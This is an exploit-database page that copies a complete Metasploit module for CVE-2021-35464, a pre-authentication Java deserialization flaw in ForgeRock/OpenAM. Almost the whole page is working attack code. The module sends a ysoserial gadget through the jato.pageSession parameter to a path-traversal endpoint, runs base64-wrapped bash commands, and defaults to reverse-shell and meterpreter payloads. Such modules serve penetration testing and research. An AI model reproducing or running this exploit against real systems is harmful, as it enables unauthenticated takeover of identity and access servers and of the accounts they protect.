Advertisement






ForgeRock / OpenAM Jato Java Deserialization

CVE Category Price Severity
CVE-2021-35464 CWE-502 $10,000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-14
CPE
cpe:cpe:/a:forgerock:openam
CVSS EPSS EPSSP
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.132 0.97527

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070078

Below is a copy:

ForgeRock / OpenAM Jato Java Deserialization
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
        update_info(
          info,
          'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',
          'Description' => %q{
            This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
            access management solution. The vulnerability arises from a Java deserialization flaw in OpenAMs
            implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
            vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.

            This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
            is susceptible to the same issue.
          },
          'Author' => [
            'Michael Stepankin',  # Original Discovery and PoC
            'bwatters-r7',        # Msf module
            'Spencer McIntyre',   # All of the Help
            'jheysel-r7'          # Check Method
          ],
          'References' => [
            ['CVE', '2021-35464'],
            ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
            ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
          ],
          'DisclosureDate' => '2021-06-29',
          'License' => MSF_LICENSE,
          'Platform' => ['unix', 'linux'],
          'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
          'Privileged' => false,
          'Targets' => [
            [
              'Unix Command',
              {
                'Platform' => 'unix',
                'Arch' => ARCH_CMD,
                'Type' => :unix_cmd,
                'DefaultOptions' => {
                  'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
                }
              }
            ],
            [
              'Linux Dropper',
              {
                'Platform' => 'linux',
                'Arch' => [ARCH_X86, ARCH_X64],
                'Type' => :linux_dropper,
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                }
              }
            ]
          ],
          'DefaultTarget' => 1,
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
          }
        )
    )
    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/openam'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
      'vars_post' => {
        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
      }
    )
    if res.nil?
      CheckCode::Unknown("The target server didn't respond!")
    elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def execute_command(cmd, _opts = {})
    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
    ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
      'vars_post' => {
        'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
      }
    )
    unless res && res.code == 302
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end
    print_good("Successfully executed command: #{cmd}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum